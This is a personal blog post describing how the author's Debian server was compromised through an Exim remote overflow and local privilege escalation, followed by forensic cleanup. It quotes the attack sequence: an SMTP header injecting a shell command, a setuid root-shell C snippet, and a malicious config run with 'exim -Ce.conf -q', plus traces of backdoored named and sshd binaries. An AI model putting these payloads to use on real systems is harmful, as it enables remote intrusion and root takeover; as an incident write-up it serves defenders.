Karl Hans Janke Kollaborativ
Heute die Welt, morgen das Sonnensystem!
<< prev next >>

System compromise


As if to put me in the right mood for the upcoming Chaos Communication Congress, the server that hosted this domain was externally realigned a few days ago. ;)

I hear the exploit has really been making the rounds (it was slashdotted, too). And I can kinda tell why: It is a really gorgeous remote buffer overflow / local priviledge escalation combo in Exim. The Exim that was included as the default mail server on Debian stable until a few days ago.

As to how it works, quoting the report by someone named Sergey Kononenko:

Here I can put brief sequence of attack:

EHLO mail.domain.com
MAIL FROM: <orderruc0e@???>
RCPT TO: <postmaster@???>
MAILbombhdr0001: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB...
MAILbombhdr0054: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB...
HeaderX: ${run{/bin/sh -c 'exec /bin/sh -i <&3 >&0 2>&0'}}${run{...
about 700000 the same strings

I'm not entirely sure what's going on in that header there, i.e. why that works, but it's obviously a remote hole that gets you a shell on the host. This would run as an unpriviledged user, but, still quoting the same source:

after that attacker gets shell with id of user Debian-exim and cwd in /var/spool/exim4 then it put file there file setuid with trivial execution of root shell:
int main(int argc, char *argv[])
setgroups(0, NULL);
execl("/bin/sh", "sh", NULL);

Yeah, that would spawn a root shell, if it could. E.g. if it was setuid root. The free sudo, as I'd like to call it. How do we get there? Check this out:

and create another file e.conf with following content:
spool_directory = ${run{/bin/chown
root:root /var/spool/exim4/setuid}}${run{/bin/chmod 4755 /var/spool/exim4/setuid}}

the he runs:

exim -Ce.conf -q

Ahahahah! There we go, just tell Exim what we want, and it does it. As root. Thanks!

So, I copied any important data off the system. Then I ran chkrootkit and rkhunter. Both emitted a bunch of bogus warnings and the latter didn't find anything. However, chkrootkit spotted a curious bash process listening on a network port. The process could actually be seen on netstat. I killed it. And Exim.

Also, I noticed pstree showing two named processes. Wait… I'm not running DNS here. And were these in the ps I did earlier? Nope, omits them.

# grep named /etc/*
rc.local: /sbin/named # Starting named daemon


# cat /etc/rc.local
/sbin/named # Starting named daemon
/usr/sbin/sshd # Starting sshd daemon
/sbin/service iptables stop # Stopping firewall

Hm, I don't have /sbin/service. Looks like his kit was expecting Red Hat.

# strings /sbin/named
Incorrect password.
.-= Backdoor made by Mironov =-.
.-= Running =-.

Aha. Some Google hits on this from years past. shrug

# strings sshd | grep -C 3 backdoor
Could not chdir to home directory %s: %s
xxxxx are %d entries in the log
xxxx xxxxx  backdoor
session_new: init
session_new: session %d

Eheheh, so that's why my ssh session died.

# find / -user root -perm -4000  # setuid root
# strings /sbin/shs
[Welcome Morfeus]

Yeah. So…

As luck would have it, I was in the middle of migrating to a new machine anyway. So I completed the move and shut the old system down.